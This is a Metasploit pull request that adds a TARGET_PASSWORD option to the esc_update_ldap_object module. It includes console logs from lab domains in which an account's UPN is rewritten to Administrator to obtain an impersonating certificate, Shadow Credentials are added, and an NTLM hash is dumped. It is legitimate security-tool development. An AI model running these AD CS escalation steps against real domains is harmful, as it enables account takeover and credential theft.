
Conversation

@jheysel-r7 (Contributor)

Updates auxiliary/admin/dcerpc/esc_update_ldap_object to work when using Shadow Credentials is not necessary. This accounts for scenarios where:

  1. The operator is attempting to update their own LDAP object (LDAPUsername == TARGET_USERNAME) in order to exploit one of the ESC misconfigurations.
  2. The operator already has the password for the TARGET_USERNAME (a TARGET_PASSWORD datastore option has been added).

Verification

Test the following three scenarios. When verifying, look to ensure the Certificate UPN in the output is getting set to the value defined in UPDATE_LDAP_OBJECT_VALUE,
e.g. Certificate UPN: Administrator. Also ensure the module is cleaning up properly: UPDATE_LDAP_OBJECT is getting reset properly and the Shadow Credential is being removed if it gets created.

Set TARGET_PASSWORD (the password for the TARGET_USERNAME) and see that the Shadow Credentials code path does not get run and the module still runs successfully.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticate as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >

Unset TARGET_PASSWORD and set TARGET_USERNAME to the same user as LDAPUsername and see that the Shadow Credentials code path does not get run and the module still runs successfully

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > unset TARGET_PASSWORD
Unsetting TARGET_PASSWORD...
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set TARGET_USERNAME user1
TARGET_USERNAME => user1
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticate as the TARGET_USERNAME
   TARGET_USERNAME           user1              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: user1@kerberos.issue
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140137_default_172.16.199.200_windows.ad.cs_629741.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: Administrator
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to user1@kerberos.issue...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user1@kerberos.issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >

Confirm the original exploit path still works: where LDAPUsername != TARGET_USERNAME and TARGET_PASSWORD is unset, the Shadow Credentials method is used and is cleaned up afterwards.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
target_username => user2
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticate as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 172.16.199.200:445 - Adding shadow credentials for user2
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[*] Certificate stored at: /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_windows.ad.cs_922206.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
[*] 172.16.199.200:445 - Getting hash for user2
[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_107720.bin
[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_991115.bin
[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140518_default_172.16.199.200_windows.ad.cs_992950.pfx
[*] 172.16.199.200:445 - Removing shadow credential
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] Deleted entry with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
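The three scenarios above boil down to one decision (how to authenticate as TARGET_USERNAME before the ICPR request) plus a cleanup invariant (the LDAP attribute is always reverted, and the msDS-KeyCredentialLink entry is removed only if one was added, even when the certificate request fails). The following is an added, self-contained Ruby model of that logic written for this page; it is not the Metasploit module's code. The in-memory directory, the `request_cert` callback, the `auth_strategy`/`run_esc_update` names and the returned operation trace are assumptions for the example; the datastore option names match the module's options table.

```ruby
# Added illustrative model of the PR's credential selection and cleanup logic.
# Not the Metasploit module's code: the directory, request_cert callback and
# return shape are assumptions; only the datastore option names come from the
# module's options table.
require 'securerandom'

# Constructed sample directory (sAMAccountName => attributes). user1 has a UPN
# set and user2 does not, matching the two cases seen in the verification logs.
def sample_directory
  {
    'user1' => { 'userPrincipalName' => 'user1@kerberos.issue', 'msDS-KeyCredentialLink' => [] },
    'user2' => { 'userPrincipalName' => nil, 'msDS-KeyCredentialLink' => [] }
  }
end

# Pick how to authenticate as TARGET_USERNAME before the certificate request:
#   :self               - operator is updating their own object, reuse LDAP creds
#   :target_password    - operator supplied the victim's password
#   :shadow_credentials - fall back to msDS-KeyCredentialLink (original path)
def auth_strategy(datastore)
  if datastore['LDAPUsername'].to_s.casecmp?(datastore['TARGET_USERNAME'].to_s)
    :self
  elsif !datastore['TARGET_PASSWORD'].to_s.empty?
    :target_password
  else
    :shadow_credentials
  end
end

# Run the flow against +directory+. +request_cert+ stands in for the ICPR
# request and may raise (e.g. a KDC error) to show that cleanup still runs.
# Returns the strategy used, the ordered operations, and whether a cert was issued.
def run_esc_update(datastore, directory, request_cert:)
  attr = datastore['UPDATE_LDAP_OBJECT']
  entry = directory.fetch(datastore['TARGET_USERNAME'])
  original = entry[attr]
  strategy = auth_strategy(datastore)
  ops = []
  device_id = nil
  issued = false
  error = nil

  begin
    entry[attr] = datastore['UPDATE_LDAP_OBJECT_VALUE']
    ops << [:update, attr, entry[attr]]

    if strategy == :shadow_credentials
      device_id = SecureRandom.uuid
      entry['msDS-KeyCredentialLink'] << device_id
      ops << [:add_shadow_credential, device_id]
    end

    request_cert.call(strategy, entry)
    issued = true
    ops << [:cert_issued, entry[attr]]
  rescue StandardError => e
    error = e.message
  ensure
    # Always undo what was changed, in reverse order, even after a failure.
    if device_id
      entry['msDS-KeyCredentialLink'].delete(device_id)
      ops << [:remove_shadow_credential, device_id]
    end
    if original.nil?
      entry.delete(attr)          # attribute was absent before: delete it (user2 case)
      ops << [:delete_attribute, attr]
    else
      entry[attr] = original      # attribute had a value: restore it (user1 case)
      ops << [:restore, attr, original]
    end
  end

  { strategy: strategy, ops: ops, issued: issued, error: error }
end

if __FILE__ == $PROGRAM_NAME
  base = { 'LDAPUsername' => 'user1', 'UPDATE_LDAP_OBJECT' => 'userPrincipalName',
           'UPDATE_LDAP_OBJECT_VALUE' => 'Administrator' }
  [
    base.merge('TARGET_USERNAME' => 'user2', 'TARGET_PASSWORD' => 'N0tpassword!'),
    base.merge('TARGET_USERNAME' => 'user1'),
    base.merge('TARGET_USERNAME' => 'user2')
  ].each do |ds|
    result = run_esc_update(ds, sample_directory, request_cert: ->(_strategy, _entry) { true })
    puts "#{ds['TARGET_USERNAME']}: #{result[:strategy]} -> #{result[:ops].map(&:first).join(', ')}"
  end
end
```

Running it prints one line per scenario; only the third (different target, no password) contains the add/remove shadow-credential steps, and passing a `request_cert` that raises shows the revert and shadow-credential removal still happen, which is the behaviour to look for when a run aborts mid-way.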

jheysel-r7 added the enhancement and rn-enhancement (release notes enhancement) labels on Sep 23, 2025
msutovsky-r7 self-assigned this on Sep 29, 2025

@msutovsky-r7 (Contributor) left a comment

Works as expected

  • TARGET_PASSWORD is set
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: msfuser@example.com
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.5.132.180:445 - Binding to \cert...
[+] 10.5.132.180:445 - Bound to \cert
[*] 10.5.132.180:445 - Requesting a certificate for user msfuser - digest algorithm: SHA256 - template: User
[+] 10.5.132.180:445 - The requested certificate was issued.
[*] 10.5.132.180:445 - Certificate Policies:
[*] 10.5.132.180:445 - Certificate UPN: Administrator
[!] 10.5.132.180:445 - No active DB -- Credential data will not be saved!
[*] 10.5.132.180:445 - Certificate stored at: /home/ms/.msf4/loot/20251001080340_default_10.5.132.180_windows.ad.cs_993110.pfx
[*] 10.5.132.180:445 - Reverting ldap object
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: Administrator
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to msfuser@example.com...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to msfuser@example.com
[+] The operation completed successfully!
[*] Auxiliary module execution completed
  • TARGET_PASSWORD is not set, TARGET_USERNAME == LDAPUsername
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of Administrator's userPrincipalName: 
[*] Attempting to update userPrincipalName for CN=Administrator,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=Administrator,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.5.132.180:445 - Binding to \cert...
[+] 10.5.132.180:445 - Bound to \cert
[*] 10.5.132.180:445 - Requesting a certificate for user Administrator - digest algorithm: SHA256 - template: User
[+] 10.5.132.180:445 - The requested certificate was issued.
[*] 10.5.132.180:445 - Certificate Policies:
[*] 10.5.132.180:445 - Certificate UPN: Administrator
[!] 10.5.132.180:445 - No active DB -- Credential data will not be saved!
[*] 10.5.132.180:445 - Certificate stored at: /home/ms/.msf4/loot/20251001080506_default_10.5.132.180_windows.ad.cs_600856.pfx
[*] 10.5.132.180:445 - Reverting ldap object
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Attempting to delete attribute userPrincipalName from CN=Administrator,CN=Users,DC=example,DC=com...
[+] Successfully deleted attribute userPrincipalName from CN=Administrator,CN=Users,DC=example,DC=com
[+] The operation completed successfully!
[*] Auxiliary module execution completed
  • TARGET_PASSWORD is not set, TARGET_USERNAME != LDAPUsername
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: msfuser@example.com
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Adding shadow credentials for msfuser
[*] 10.5.132.180:445 - Loading admin/ldap/shadow_credentials
[*] 10.5.132.180:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 10.5.132.180:389 Discovered base DN: DC=example,DC=com
[*] Successfully queried (sAMAccountName=msfuser).
[!] No active DB -- Credential data will not be saved!
[*] Certificate stored at: /home/ms/.msf4/loot/20251001080543_default_10.5.132.180_windows.ad.cs_716414.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 5d54d7de-3b29-6df6-5f04-866708dba976
[*] 10.5.132.180:445 - Loading admin/kerberos/get_ticket
[*] 10.5.132.180:445 - Getting hash for msfuser
[!] Warning: Provided principal and realm (msfuser@example.com) do not match entries in certificate:
[-] Auxiliary aborted due to failure: unknown: Kerberos Error - KDC_ERR_CLIENT_NAME_MISMATCH (75) - PKINIT - KDC_ERR_CLIENT_NAME_MISMATCH
[*] 10.5.132.180:445 - Removing shadow credential
[*] 10.5.132.180:445 - Loading admin/ldap/shadow_credentials
[*] 10.5.132.180:445 - Running admin/ldap/shadow_credentials
[trimmed]

msutovsky-r7 merged commit 6e06963 into rapid7:master on Oct 1, 2025
20 checks passed

@msutovsky-r7 (Contributor)

Release Notes

This updates the esc_update_ldap module and takes into account the situations where shadow credentials are not required. Now the module will not use shadow credentials, unless it has to.
